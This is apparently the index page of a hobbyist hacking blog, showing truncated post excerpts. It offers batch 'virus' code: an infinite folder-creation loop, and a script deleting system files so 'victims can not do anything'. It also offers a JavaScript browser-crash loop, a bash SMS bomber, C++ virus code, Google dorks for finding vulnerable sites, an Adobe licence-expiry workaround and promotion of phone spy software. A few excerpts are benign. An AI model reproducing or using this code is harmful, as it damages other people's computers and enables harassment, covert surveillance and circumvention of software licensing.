Hack using Google dork. Find vulnerable websites using Google dork.
Download From Here
Don’t you know how to use this google dork list?
Read this article
WHAT IS A DENIAL OF SERVICE ATTACK?
A denial-of-service attack (DoS attack) or distributed denial-of-service attack (DDoS attack) is an attempt to make a computer resource unavailable to its intended users. Although the means to carry out, motives for, and targets of a DoS attack may vary, it...
Now i am going to give you simple and only one line Batch code. Special about this virus is that easy to remember the code. So it will be useful to use in college or school.
This is for newbie. This virus is harmful for CPU. So be careful. Don’t run this in your pc or friend pc.
Open a...
Hi Hackers, this batch code will very helpful for you. This is simple and effective virus code.
As usual open notepad.
Copy this code to Notepad.
@echo off
:top
md %random%
goto top
@echo off makes it so that it appears to be a blank screen but actually its making hundreds of folder.
md...
Tracing or Routing a website using command prompt. This tip is only meant for educational purpose. I mainly use this trick to find out the hosting provider where a particular domain is hosted.
Follow the below steps:
1. Start->Run->CMD ie; open Command prompt
2. Type the following command and...
Are you getting this error while opening Photoshop CS3 or Illustrator CS3
“Product License Has Expired”
1. delete cache.db in “c:Program FilesCommon FilesAdobeAdobe PCDcache”
2. Run the adobe cs3 product
3. enter the products key for adobe cs3 product
4. set read-only attribute for “c:Program...
Usually we write simple viruses in batch programming. This time also i have one Batch Programming. It will delete explore.exe,logoff ,mouse,keyboard files. So victims can not do anything in his computer.
@echo off
@if exist c:windowssystem32mouse del c:windowssystem32mouse
@if exist...
This Post is writtern By disk0
A friend and I wrote this command line SMS bomber in Bash. It allows you to set the message you want to send, the phone number to send it to, the carrier of the phone (which can be found at http://www.fonefinder.net), and the delay between messages. You’ll need...
With more and more exploits being written in JavaScript, even some 0-day, there is a need to be able to reverse exploits written in JavaScript beyond de-obfuscation. I spent some time this weekend searching Google for a simple way to reverse JavaScript shellcode to assembly. I know people do it...
If you are the administrator of public cafe or school,this trick will be helpful for giving protection to your system. You can disable writing to USB. This will prevent from file stealing. You have to login to administrator so that you can access regedit.
Go to start . Select run.
Type as...
So far we have seen lot of keyloggers for computer. Now i am going to introduce mobile spy software to my blog visitors.
Mobile Spy is the next generation of smartphone spy software. Do you suspect that your child or employee is abusing their SMS or vehicle privileges? If yes, then this...
Hi friends,here i give you give the C++ virus code. Actually Batch code is converted to C++ virus code. If you like you can use it as batch code also.
C++ Virus Code :
#include < windows.h >
#include < fstream.h >
#include < iostream.h >
#include < string.h >
#include < conio.h >
int main()
{...
You may need this website. Some websites may store the password in binary format. You can view the password by decoding the Binary to ASCII. Also you can encode the ASCII character to Binary digits.
Visit:
http://www.theskull.com/javascript/ascii-binary.html
Hi this is very simple javascript code to crash the client browser. If you don’t know about javascript ,visit www.w3schools.com(i learn lot of languages quickly there).
<script type=’javascript’>
function crash()
{
while(1==1)
{
location.reload(true);
}
</script>
This code will reload the page...
MD5 is one of the famous Hash algorithm. This algorithm is used in many websites for storing the password in encrypted form. The MD5 message-digest algorithm was developed by Ronald Rivest at MIT in 1992. This algorithm takes a input message of arbitrary length and produces a 128-bit hash value...
Is your favorite website disabled the right click button? No need to worry. you can enable the Right Click button after reading this article.
There are different tools for disabling the javascript. But i will introduce again my favorite and best web delveloper tool for you. This is one of...